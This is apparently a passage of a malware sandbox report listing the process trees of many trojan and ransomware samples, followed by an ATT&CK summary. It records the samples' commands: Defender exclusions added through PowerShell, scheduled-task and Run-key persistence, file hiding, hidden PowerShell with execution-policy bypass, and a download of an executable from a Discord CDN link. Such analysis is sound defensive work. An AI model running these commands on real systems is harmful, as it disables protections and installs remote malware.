- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2020 -
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe"C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:5196
-
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-d87374e98b04a552b43671748cd846f1ecff5b1c31172f8e80a2acdc9bb13567.exeHEUR-Trojan.MSIL.Crypt.gen-d87374e98b04a552b43671748cd846f1ecff5b1c31172f8e80a2acdc9bb13567.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3664 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3664 -s 9044⤵
- Program crash
PID:3648
-
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-df0a37eacb80e772be78ec2a3e71546d18d68ba918b8ca859e8707da81b9bb02.exeHEUR-Trojan.MSIL.Crypt.gen-df0a37eacb80e772be78ec2a3e71546d18d68ba918b8ca859e8707da81b9bb02.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exeHEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4564 -
C:\Users\Admin\AppData\Local\Temp4qsldidhv1r.exe"C:\Users\Admin\AppData\Local\Temp4qsldidhv1r.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4776 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4776 -s 19965⤵
- Program crash
PID:4692
-
-
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exeHEUR-Trojan.MSIL.Cryptos.gen-bc7295a0f160c635706426e02f2b91a65f91543438e6fc6c555a0bf6a85a3077.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3200 -
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:2704 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit5⤵PID:3044
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"5⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3676 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit7⤵PID:2968
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2864
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'8⤵
- Scheduled Task/Job: Scheduled Task
PID:5540
-
-
-
C:\Windows\system32\services32.exe"C:\Windows\system32\services32.exe"7⤵
- Checks computer location settings
PID:6080 -
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit8⤵PID:1496
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"8⤵PID:5076
-
C:\Users\Admin\AppData\Local\Temp\svchost32.exeC:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"9⤵
- Checks computer location settings
- Drops file in System32 directory
PID:2988 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit10⤵PID:1908
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'11⤵
- Scheduled Task/Job: Scheduled Task
PID:5868
-
-
-
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"10⤵PID:4524
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"10⤵PID:4104
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 311⤵PID:3748
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"7⤵PID:6136
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵PID:3652
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe"C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe"4⤵
- Executes dropped EXE
PID:4968 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\A853.bat C:\Users\Admin\AppData\Local\Temp\UpdateChecker.exe"5⤵PID:3328
-
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""6⤵
- Executes dropped EXE
PID:1636
-
-
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""6⤵
- Executes dropped EXE
PID:4500
-
-
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/872884812841648218/1622305117.exe" "1622305117.exe" "" "" "" "" "" ""6⤵
- Executes dropped EXE
PID:5464
-
-
C:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\A851.tmp\A852.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""6⤵PID:2236
-
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\00462\ERROR REPORT.txt4⤵
- System Location Discovery: System Language Discovery
PID:1764
-
-
-
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Agent.bajf-f65fafe8abf65e7503162428814c31afbd1400ed64a3c324d3afe47047efd752.exeTrojan-Ransom.Win32.Agent.bajf-f65fafe8abf65e7503162428814c31afbd1400ed64a3c324d3afe47047efd752.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2864 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 2244⤵
- Program crash
PID:5100
-
-
-
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exeTrojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:5336 -
C:\Windows\SysWOW64\cmd.execmd /Q /C move /Y Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe C:\Users\Admin\AppData\Roaming\csrss.exe4⤵
- System Location Discovery: System Language Discovery
PID:5456
-
-
C:\Windows\SysWOW64\cmd.execmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f4⤵
- System Location Discovery: System Language Discovery
PID:5788 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Mystic Entertainment" /f5⤵
- System Location Discovery: System Language Discovery
PID:5960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C "attrib +S +H C:\Users\Admin\AppData\Roaming\csrss.exe"4⤵
- System Location Discovery: System Language Discovery
PID:4436 -
C:\Windows\SysWOW64\attrib.exeattrib +S +H C:\Users\Admin\AppData\Roaming\csrss.exe5⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:4500
-
-
-
-
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Blocker.mgn-b02abdc5dfa6b16dcff708bdedb876333bbbf8c3b3966dbb317edadff584126d.exeTrojan-Ransom.Win32.Blocker.mgn-b02abdc5dfa6b16dcff708bdedb876333bbbf8c3b3966dbb317edadff584126d.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5412 -
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5124 -
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE5⤵
- System Location Discovery: System Language Discovery
PID:2040
-
-
-
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4912 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /t REG_SZ /v COM_LOADER /d "\\.\F:\Program Files\PDF_Reader\bin\COM7.EXE"5⤵
- Adds Run key to start application
- Modifies registry key
PID:1992
-
-
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe5⤵
- System Location Discovery: System Language Discovery
PID:5404
-
-
-
-
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Crypren.aidd-f2fed74902730102b3666009d639d2cd8211d13445c13658896fd92000a9612e.exeTrojan-Ransom.Win32.Crypren.aidd-f2fed74902730102b3666009d639d2cd8211d13445c13658896fd92000a9612e.exe3⤵
- Executes dropped EXE
PID:5492
-
-
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exeTrojan-Ransom.Win32.Cryptodef.aoo-960306dc1fc227939790b4242f4e812aef164bda3e7bd3b3a1f22788e65300a7.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5588 -
C:\Users\Admin\AppData\Local\Temp\wujek.exe"C:\Users\Admin\AppData\Local\Temp\wujek.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5856
-
-
-
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exeTrojan-Ransom.Win32.GenericCryptor.cys-364e6e208c6074b907cabf8bb826155775e3a9c74044fa0c8d994dfff61d2364.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5756 -
C:\Users\Admin\AppData\Local\Temp\magek.exe"C:\Users\Admin\AppData\Local\Temp\magek.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4020 -
C:\Users\Admin\AppData\Local\Temp\siude.exe"C:\Users\Admin\AppData\Local\Temp\siude.exe"5⤵
- System Location Discovery: System Language Discovery
PID:5396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\_uinsey.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:1692
-
-
-
C:\Users\Admin\Desktop\00462\Trojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exeTrojan-Ransom.Win32.GenericCryptor.czo-73385e09346d834147a4b68db0b839c783123b030761a724b8bea5a904039354.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5864 -
C:\Users\Admin\AppData\Local\Temp\magek.exe"C:\Users\Admin\AppData\Local\Temp\magek.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sanfdr.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:5372
-
-
-
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exeTrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe3⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5996 -
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exeTrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:5064
-
-
-
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exeTrojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:6012 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"4⤵PID:1472
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:5820
-
-
-
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exeTrojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6024 -
C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe"C:\Users\Admin\AppData\Roaming\GoogleUpdate\Google.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5960 -
C:\Windows\SysWOW64\cmd.exe"cmd"5⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- System Location Discovery: System Language Discovery
- NTFS ADS
PID:5772
-
-
-
-
C:\Users\Admin\Desktop\00462\Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exeTrojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe3⤵
- Checks computer location settings
- Deletes itself
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:6040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exePowershell -executionpolicy bypass -NonInteractive -windowstyle Hidden -file C:\Users\Admin\AppData\Local\Temp\tmpD433.tmp.ps14⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5212
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /f /tn MicrosoftOneDriveStandalone /tr "C:\Users\Admin\AppData\Roaming\windows\SecurityCryptography.exe"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3512
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 7 /f /tn SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\windows\microsoft.foundation.diagnostics.exe"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3232
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1B11.tmp.bat" "4⤵
- System Location Discovery: System Language Discovery
PID:5876 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM "Hetman Partition Recovery.exe"5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
-
C:\Users\Admin\AppData\Local\Temp\tmp1E0F.tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp1E0F.tmp.exe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:5624 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\install\active.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:5260 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM "SpotifyConverter.exe"6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1824
-
-
-
C:\Users\Admin\AppData\Roaming\install\name.exe"C:\Users\Admin\AppData\Roaming\install\name.exe"5⤵
- System Location Discovery: System Language Discovery
PID:216
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\install\tactive.vbs"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3748 -
C:\Program Files (x86)\TunesKit Music Converter\SpotifyConverter.exe"C:\Program Files (x86)\TunesKit Music Converter\SpotifyConverter.exe"6⤵PID:5088
-
-
-
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-0155894f2ad1ef4217f3281c96169df6148ac32c7bf2aa35a320d8806a715e79.exeWin.Ransomware.Azvo-9979243-0-0155894f2ad1ef4217f3281c96169df6148ac32c7bf2aa35a320d8806a715e79.exe3⤵
- Executes dropped EXE
PID:3616
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-107cfb10b85f27081475968b9c655f70d678283df2029cd3d510d2ac4ab1abb4.exeWin.Ransomware.Azvo-9979243-0-107cfb10b85f27081475968b9c655f70d678283df2029cd3d510d2ac4ab1abb4.exe3⤵
- Executes dropped EXE
PID:2572
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-15e7a36d54970419f5e9629a3c3607a87c7e0424ceaadf37e493c4c5a2c1ab7b.exeWin.Ransomware.Azvo-9979243-0-15e7a36d54970419f5e9629a3c3607a87c7e0424ceaadf37e493c4c5a2c1ab7b.exe3⤵
- Executes dropped EXE
PID:5892
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-19d655c11e2dd8e33ee0b22a199121605b5eeba1e4bd3faadd3fe2498a9273a1.exeWin.Ransomware.Azvo-9979243-0-19d655c11e2dd8e33ee0b22a199121605b5eeba1e4bd3faadd3fe2498a9273a1.exe3⤵
- Executes dropped EXE
PID:5820
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-313f5fd480c090a7c82f7eddf8c0d1e8b9fd0bf7ccf91c1d68e713bfc99bcef8.exeWin.Ransomware.Azvo-9979243-0-313f5fd480c090a7c82f7eddf8c0d1e8b9fd0bf7ccf91c1d68e713bfc99bcef8.exe3⤵
- Executes dropped EXE
PID:552
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-489187c02dc221272fe21e1b98fa0829fd0fb5e34e485581d861583ec812db26.exeWin.Ransomware.Azvo-9979243-0-489187c02dc221272fe21e1b98fa0829fd0fb5e34e485581d861583ec812db26.exe3⤵
- Executes dropped EXE
PID:3616
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-51c251c1c631f2cf9747859ed7504c8b457aa208ac76ad172cee63f062f8e857.exeWin.Ransomware.Azvo-9979243-0-51c251c1c631f2cf9747859ed7504c8b457aa208ac76ad172cee63f062f8e857.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5172 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1692
-
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-5217efafa021c6db6953f47edf76847d13e16e025201ec1b121eb9a44f794df9.exeWin.Ransomware.Azvo-9979243-0-5217efafa021c6db6953f47edf76847d13e16e025201ec1b121eb9a44f794df9.exe3⤵
- Executes dropped EXE
PID:5404
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-704fe6e056b3eb3d456cc42358931e46a6200f271c2ac000983fd4c5c3c5b448.exeWin.Ransomware.Azvo-9979243-0-704fe6e056b3eb3d456cc42358931e46a6200f271c2ac000983fd4c5c3c5b448.exe3⤵
- Executes dropped EXE
PID:1048
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-81344710637c19e5d348418999f93546e11f45ee16831b1b5cc6e2d3812c4968.exeWin.Ransomware.Azvo-9979243-0-81344710637c19e5d348418999f93546e11f45ee16831b1b5cc6e2d3812c4968.exe3⤵
- Executes dropped EXE
PID:3168
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exeWin.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6004
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-e0b326ecd36bb60605627755c09f87a26ba2a986e21ff06c6a1c8ca1b2368f38.exeWin.Ransomware.Azvo-9979243-0-e0b326ecd36bb60605627755c09f87a26ba2a986e21ff06c6a1c8ca1b2368f38.exe3⤵PID:5640
-
-
C:\Users\Admin\Desktop\00462\Win.Ransomware.Azvo-9979243-0-ece1138f7974f8945510c7802a89e9d30122621bd018d23d508dd25aa05457c2.exeWin.Ransomware.Azvo-9979243-0-ece1138f7974f8945510c7802a89e9d30122621bd018d23d508dd25aa05457c2.exe3⤵PID:5944
-
-
C:\Users\Admin\Desktop\00462\Win.Trojan.Crypted-29-0c54f7f1fdc78f8691e4984b636889f8d39faf868ac54998f8af8534404ce537.exeWin.Trojan.Crypted-29-0c54f7f1fdc78f8691e4984b636889f8d39faf868ac54998f8af8534404ce537.exe3⤵
- System Location Discovery: System Language Discovery
PID:5176 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5176 -s 2284⤵
- Program crash
PID:1992
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:820 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4996
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2864 -ip 28641⤵PID:3644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3664 -ip 36641⤵PID:2052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 4776 -ip 47761⤵PID:1228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5176 -ip 51761⤵PID:2840
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:1824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5708 -ip 57081⤵PID:2240
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify System Firewall
